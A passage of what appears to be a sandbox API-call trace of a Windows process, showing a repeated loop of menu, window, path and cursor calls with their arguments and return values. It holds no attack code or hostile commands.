(lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.619] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.619] GetMenu (hWnd=0x0) returned 0x0 [0100.619] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.619] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.619] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.619] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.619] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.619] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.619] GetStockObject (i=6) returned 0x1b00018 [0100.619] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.619] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.619] PathFileExistsW (pszPath=0x0) returned 0 [0100.619] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.619] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.619] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.619] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.619] GetMenu (hWnd=0x0) returned 0x0 [0100.619] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x141) returned -1 [0100.619] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.619] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.619] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.619] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.619] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.619] GetStockObject (i=6) returned 0x1b00018 [0100.619] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.619] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.619] PathFileExistsW (pszPath=0x0) returned 0 [0100.619] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.619] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.619] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.619] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.619] GetMenu (hWnd=0x0) returned 0x0 [0100.619] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.620] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.620] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.620] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.620] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.620] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.620] GetStockObject (i=6) returned 0x1b00018 [0100.620] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.620] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.620] PathFileExistsW (pszPath=0x0) returned 0 [0100.620] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.620] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.620] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.620] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.620] GetMenu (hWnd=0x0) returned 0x0 [0100.620] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.620] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.620] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.620] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.620] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.620] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.620] GetStockObject (i=6) returned 0x1b00018 [0100.620] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.620] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.620] PathFileExistsW (pszPath=0x0) returned 0 [0100.620] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.620] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.620] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.620] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.620] GetMenu (hWnd=0x0) returned 0x0 [0100.620] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.620] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.620] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.620] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.620] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.620] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.620] GetStockObject (i=6) returned 0x1b00018 [0100.621] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.621] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.621] PathFileExistsW (pszPath=0x0) returned 0 [0100.621] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.621] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.621] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.621] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.621] GetMenu (hWnd=0x0) returned 0x0 [0100.621] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.621] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.621] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.621] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.621] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.621] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.621] GetStockObject (i=6) returned 0x1b00018 [0100.621] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.621] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.621] PathFileExistsW (pszPath=0x0) returned 0 [0100.621] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.621] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.621] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.621] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.621] GetMenu (hWnd=0x0) returned 0x0 [0100.621] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xa5) returned -1 [0100.621] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.621] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.621] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.621] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.621] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.621] GetStockObject (i=6) returned 0x1b00018 [0100.621] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.621] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.621] PathFileExistsW (pszPath=0x0) returned 0 [0100.621] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.621] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.621] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.621] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.622] GetMenu (hWnd=0x0) returned 0x0 [0100.622] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.622] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.622] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.622] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.622] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.622] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.622] GetStockObject (i=6) returned 0x1b00018 [0100.622] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.622] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.622] PathFileExistsW (pszPath=0x0) returned 0 [0100.622] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.622] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.622] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.622] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.622] GetMenu (hWnd=0x0) returned 0x0 [0100.622] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.622] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.622] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.622] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.622] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.622] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.622] GetStockObject (i=6) returned 0x1b00018 [0100.622] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.622] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.622] PathFileExistsW (pszPath=0x0) returned 0 [0100.622] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.622] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.622] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.622] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.622] GetMenu (hWnd=0x0) returned 0x0 [0100.622] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.622] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.622] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.622] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.622] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.623] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.623] GetStockObject (i=6) returned 0x1b00018 [0100.623] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.623] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.623] PathFileExistsW (pszPath=0x0) returned 0 [0100.623] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.623] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.623] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.623] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.623] GetMenu (hWnd=0x0) returned 0x0 [0100.623] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.623] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.623] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.623] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.623] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.623] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.623] GetStockObject (i=6) returned 0x1b00018 [0100.623] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.623] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.623] PathFileExistsW (pszPath=0x0) returned 0 [0100.623] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.623] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.623] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.623] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.623] GetMenu (hWnd=0x0) returned 0x0 [0100.623] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4b8) returned -1 [0100.623] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.623] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.623] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.623] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.623] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.623] GetStockObject (i=6) returned 0x1b00018 [0100.623] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.623] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.623] PathFileExistsW (pszPath=0x0) returned 0 [0100.623] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.623] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.624] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.624] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.624] GetMenu (hWnd=0x0) returned 0x0 [0100.624] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.624] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.624] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.624] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.624] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.624] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.624] GetStockObject (i=6) returned 0x1b00018 [0100.624] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.624] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.624] PathFileExistsW (pszPath=0x0) returned 0 [0100.624] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.624] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.624] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.624] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.624] GetMenu (hWnd=0x0) returned 0x0 [0100.624] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.624] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.624] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.624] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.624] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.624] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.624] GetStockObject (i=6) returned 0x1b00018 [0100.624] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.624] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.624] PathFileExistsW (pszPath=0x0) returned 0 [0100.624] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.624] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.624] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.624] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.624] GetMenu (hWnd=0x0) returned 0x0 [0100.624] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.624] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.624] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.625] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.625] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.625] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.625] GetStockObject (i=6) returned 0x1b00018 [0100.625] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.625] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.625] PathFileExistsW (pszPath=0x0) returned 0 [0100.625] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.625] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.625] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.625] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.625] GetMenu (hWnd=0x0) returned 0x0 [0100.625] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.625] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.625] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.625] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.625] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.625] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.625] GetStockObject (i=6) returned 0x1b00018 [0100.625] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.625] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.625] PathFileExistsW (pszPath=0x0) returned 0 [0100.625] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.625] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.625] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.625] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.625] GetMenu (hWnd=0x0) returned 0x0 [0100.625] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4da) returned -1 [0100.625] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.625] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.625] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.625] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.625] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.625] GetStockObject (i=6) returned 0x1b00018 [0100.625] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.626] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.626] PathFileExistsW (pszPath=0x0) returned 0 [0100.626] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.626] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.626] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.626] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.626] GetMenu (hWnd=0x0) returned 0x0 [0100.626] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.626] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.626] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.626] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.626] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.626] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.626] GetStockObject (i=6) returned 0x1b00018 [0100.626] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.626] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.626] PathFileExistsW (pszPath=0x0) returned 0 [0100.626] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.626] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.626] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.626] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.626] GetMenu (hWnd=0x0) returned 0x0 [0100.626] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.626] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.626] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.626] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.626] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.626] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.626] GetStockObject (i=6) returned 0x1b00018 [0100.626] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.626] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.626] PathFileExistsW (pszPath=0x0) returned 0 [0100.626] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.626] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.626] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.626] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.626] GetMenu (hWnd=0x0) returned 0x0 [0100.627] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.627] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.627] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.627] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.627] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.627] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.627] GetStockObject (i=6) returned 0x1b00018 [0100.627] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.627] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.627] PathFileExistsW (pszPath=0x0) 